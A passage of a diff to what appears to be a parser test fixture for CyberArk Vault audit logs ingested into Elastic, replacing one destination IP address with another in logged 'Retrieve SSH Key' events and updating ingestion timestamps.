@@ -65,7 +56,7 @@ "reason": "(Action: Retrieve SSH key)for fun and profit", "iso_timestamp": "2021-03-11T17:43:44Z", "gateway_station": "10.0.1.20", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 09:43:44\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T17:43:44Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e428\u003c/MessageID\u003e\n \u003cDesc\u003eRetrieve SSH Key\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eRetrieve SSH Key\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSM\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSHKeys-34.123.103.115-adrian\u003c/File\u003e\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e(Action: Retrieve SSH key)for fun and profit\u003c/Reason\u003e\n \u003cPvwaDetails\u003e\u003cRetrieveReason\u003e\n \u003cGeneral\u003e\n \u003cUserReason\u003efor fun and profit\u003c/UserReason\u003e\n \u003cRetrieveAction\u003eRetrieve SSH key\u003c/RetrieveAction\u003e\n \u003c/General\u003e\n\u003c/RetrieveReason\u003e\u003c/PvwaDetails\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eRetrieve SSH Key\u003c/Message\u003e\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"adrian\"\u003e\u003c/CAProperty\u003e\n 
\u003cCAProperty Name=\"Address\" Value=\"34.123.103.115\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 09:43:44\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T17:43:44Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e428\u003c/MessageID\u003e\n \u003cDesc\u003eRetrieve SSH Key\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eRetrieve SSH Key\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSM\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e(Action: Retrieve SSH key)for fun and profit\u003c/Reason\u003e\n \u003cPvwaDetails\u003e\u003cRetrieveReason\u003e\n \u003cGeneral\u003e\n \u003cUserReason\u003efor fun and profit\u003c/UserReason\u003e\n \u003cRetrieveAction\u003eRetrieve SSH key\u003c/RetrieveAction\u003e\n \u003c/General\u003e\n\u003c/RetrieveReason\u003e\u003c/PvwaDetails\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eRetrieve SSH Key\u003c/Message\u003e\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\n 
\u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"adrian\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "Retrieve SSH Key", "issuer": "Administrator", "pvwa_details": { @@ -80,12 +71,12 @@ "ca_properties": { "other": {}, "device_type": "Operating System", - "address": "34.123.103.115", + "address": "67.43.156.15", "creation_method": "PVWA", "policy_id": "UnixSSHKeys", "user_name": "adrian" }, - "file": "Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian", + "file": "Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian", "safe": "PSM", "station": "127.0.0.1", "action": "Retrieve SSH Key", 
@@ -99,8 +90,8 @@ "event": { "severity": 2, "reason": "(Action: Retrieve SSH key)for fun and profit", - "ingested": "2021-06-09T10:24:35.337710600Z", - "original": "\u003c5\u003e1 2021-03-11T17:43:44Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:43:44\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:43:44Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e428\u003c/MessageID\u003e\\n \u003cDesc\u003eRetrieve SSH Key\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eRetrieve SSH Key\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-34.123.103.115-adrian\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e(Action: Retrieve SSH key)for fun and profit\u003c/Reason\u003e\\n \u003cPvwaDetails\u003e\u003cRetrieveReason\u003e\\n \u003cGeneral\u003e\\n \u003cUserReason\u003efor fun and profit\u003c/UserReason\u003e\\n \u003cRetrieveAction\u003eRetrieve SSH key\u003c/RetrieveAction\u003e\\n \u003c/General\u003e\\n\u003c/RetrieveReason\u003e\u003c/PvwaDetails\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eRetrieve SSH Key\u003c/Message\u003e\\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty 
Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"34.123.103.115\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 09:43:44\",\"IsoTimestamp\":\"2021-03-11T17:43:44Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"428\",\"Desc\":\"Retrieve SSH Key\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Retrieve SSH Key\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-34.123.103.115-adrian\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"(Action: Retrieve SSH key)for fun and profit\",\"PvwaDetails\":{\"RetrieveReason\":{\"General\":{\"UserReason\":\"for fun and profit\",\"RetrieveAction\":\"Retrieve SSH key\"}}},\"ExtraDetails\":\"\",\"Message\":\"Retrieve SSH Key\",\"GatewayStation\":\"10.0.1.20\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"34.123.103.115\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", + "ingested": "2021-12-09T13:37:04.741497400Z", + "original": "\u003c5\u003e1 2021-03-11T17:43:44Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 
09:43:44\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:43:44Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e428\u003c/MessageID\u003e\\n \u003cDesc\u003eRetrieve SSH Key\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eRetrieve SSH Key\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e(Action: Retrieve SSH key)for fun and profit\u003c/Reason\u003e\\n \u003cPvwaDetails\u003e\u003cRetrieveReason\u003e\\n \u003cGeneral\u003e\\n \u003cUserReason\u003efor fun and profit\u003c/UserReason\u003e\\n \u003cRetrieveAction\u003eRetrieve SSH key\u003c/RetrieveAction\u003e\\n \u003c/General\u003e\\n\u003c/RetrieveReason\u003e\u003c/PvwaDetails\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eRetrieve SSH Key\u003c/Message\u003e\\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" 
Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 09:43:44\",\"IsoTimestamp\":\"2021-03-11T17:43:44Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"428\",\"Desc\":\"Retrieve SSH Key\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Retrieve SSH Key\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"(Action: Retrieve SSH key)for fun and profit\",\"PvwaDetails\":{\"RetrieveReason\":{\"General\":{\"UserReason\":\"for fun and profit\",\"RetrieveAction\":\"Retrieve SSH key\"}}},\"ExtraDetails\":\"\",\"Message\":\"Retrieve SSH Key\",\"GatewayStation\":\"10.0.1.20\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "428", "kind": "event", "action": "retrieve ssh key", @@ -124,20 +115,11 @@ } }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "34.123.103.115", "user": { "name": "adrian" }, - "ip": "34.123.103.115" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "source": { "user": { @@ -160,7 +142,7 @@ }, "@timestamp": "2021-03-11T21:08:48.000Z", "file": { - "path": "Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian" + "path": "Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian" }, "ecs": { "version": "1.12.0" 
@@ -172,17 +154,17 @@ ], "ip": [ "127.0.0.1", - "34.123.103.115", + "67.43.156.15", "10.0.1.20" ] }, "cyberarkpas": { "audit": { "severity": "Info", - "reason": "(Action: Connect)testing(Connection to address: 34.123.103.115)", + "reason": "(Action: Connect)testing(Connection to address: 67.43.156.15)", "iso_timestamp": "2021-03-11T21:08:48Z", "gateway_station": "10.0.1.20", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 13:08:48\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T21:08:48Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e428\u003c/MessageID\u003e\n \u003cDesc\u003eRetrieve SSH Key\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eRetrieve SSH Key\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSM\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSHKeys-34.123.103.115-adrian\u003c/File\u003e\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e(Action: Connect)testing(Connection to address: 34.123.103.115)\u003c/Reason\u003e\n \u003cPvwaDetails\u003e\u003cRetrieveReason\u003e\n \u003cGeneral\u003e\n \u003cUserReason\u003etesting\u003c/UserReason\u003e\n \u003cRetrieveAction\u003eConnect\u003c/RetrieveAction\u003e\n \u003c/General\u003e\n \u003cConnectionDetails\u003e\n \u003cConnectionAddress\u003e34.123.103.115\u003c/ConnectionAddress\u003e\n \u003c/ConnectionDetails\u003e\n\u003c/RetrieveReason\u003e\u003c/PvwaDetails\u003e\n 
\u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eRetrieve SSH Key\u003c/Message\u003e\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"adrian\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"34.123.103.115\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 13:08:48\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T21:08:48Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e428\u003c/MessageID\u003e\n \u003cDesc\u003eRetrieve SSH Key\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eRetrieve SSH Key\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSM\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e(Action: Connect)testing(Connection to address: 67.43.156.15)\u003c/Reason\u003e\n \u003cPvwaDetails\u003e\u003cRetrieveReason\u003e\n 
\u003cGeneral\u003e\n \u003cUserReason\u003etesting\u003c/UserReason\u003e\n \u003cRetrieveAction\u003eConnect\u003c/RetrieveAction\u003e\n \u003c/General\u003e\n \u003cConnectionDetails\u003e\n \u003cConnectionAddress\u003e67.43.156.15\u003c/ConnectionAddress\u003e\n \u003c/ConnectionDetails\u003e\n\u003c/RetrieveReason\u003e\u003c/PvwaDetails\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eRetrieve SSH Key\u003c/Message\u003e\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"adrian\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "Retrieve SSH Key", "issuer": "Administrator", "pvwa_details": { @@ -192,7 +174,7 @@ "user_reason": "testing" }, "connection_details": { - "connection_address": "34.123.103.115" + "connection_address": "67.43.156.15" } } }, @@ -200,12 +182,12 @@ "ca_properties": { "other": {}, "device_type": "Operating System", - "address": "34.123.103.115", + "address": "67.43.156.15", "creation_method": "PVWA", "policy_id": "UnixSSHKeys", "user_name": "adrian" }, - "file": "Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian", + "file": "Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian", "safe": "PSM", "station": "127.0.0.1", "action": "Retrieve SSH Key", 
@@ -218,9 +200,9 @@ }, "event": { "severity": 2, - "reason": "(Action: Connect)testing(Connection to address: 34.123.103.115)", - "ingested": "2021-06-09T10:24:35.337721500Z", - "original": "\u003c5\u003e1 2021-03-11T21:08:48Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 13:08:48\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T21:08:48Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e428\u003c/MessageID\u003e\\n \u003cDesc\u003eRetrieve SSH Key\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eRetrieve SSH Key\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-34.123.103.115-adrian\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e(Action: Connect)testing(Connection to address: 34.123.103.115)\u003c/Reason\u003e\\n \u003cPvwaDetails\u003e\u003cRetrieveReason\u003e\\n \u003cGeneral\u003e\\n \u003cUserReason\u003etesting\u003c/UserReason\u003e\\n \u003cRetrieveAction\u003eConnect\u003c/RetrieveAction\u003e\\n \u003c/General\u003e\\n \u003cConnectionDetails\u003e\\n \u003cConnectionAddress\u003e34.123.103.115\u003c/ConnectionAddress\u003e\\n \u003c/ConnectionDetails\u003e\\n\u003c/RetrieveReason\u003e\u003c/PvwaDetails\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n 
\u003cMessage\u003eRetrieve SSH Key\u003c/Message\u003e\\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"34.123.103.115\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 13:08:48\",\"IsoTimestamp\":\"2021-03-11T21:08:48Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"428\",\"Desc\":\"Retrieve SSH Key\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Retrieve SSH Key\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-34.123.103.115-adrian\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"(Action: Connect)testing(Connection to address: 34.123.103.115)\",\"PvwaDetails\":{\"RetrieveReason\":{\"General\":{\"UserReason\":\"testing\",\"RetrieveAction\":\"Connect\"},\"ConnectionDetails\":{\"ConnectionAddress\":\"34.123.103.115\"}}},\"ExtraDetails\":\"\",\"Message\":\"Retrieve SSH Key\",\"GatewayStation\":\"10.0.1.20\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"34.123.103.115\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", + "reason": "(Action: Connect)testing(Connection to address: 
67.43.156.15)", + "ingested": "2021-12-09T13:37:04.741505500Z", + "original": "\u003c5\u003e1 2021-03-11T21:08:48Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 13:08:48\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T21:08:48Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e428\u003c/MessageID\u003e\\n \u003cDesc\u003eRetrieve SSH Key\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eRetrieve SSH Key\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e(Action: Connect)testing(Connection to address: 67.43.156.15)\u003c/Reason\u003e\\n \u003cPvwaDetails\u003e\u003cRetrieveReason\u003e\\n \u003cGeneral\u003e\\n \u003cUserReason\u003etesting\u003c/UserReason\u003e\\n \u003cRetrieveAction\u003eConnect\u003c/RetrieveAction\u003e\\n \u003c/General\u003e\\n \u003cConnectionDetails\u003e\\n \u003cConnectionAddress\u003e67.43.156.15\u003c/ConnectionAddress\u003e\\n \u003c/ConnectionDetails\u003e\\n\u003c/RetrieveReason\u003e\u003c/PvwaDetails\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eRetrieve SSH Key\u003c/Message\u003e\\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\\n 
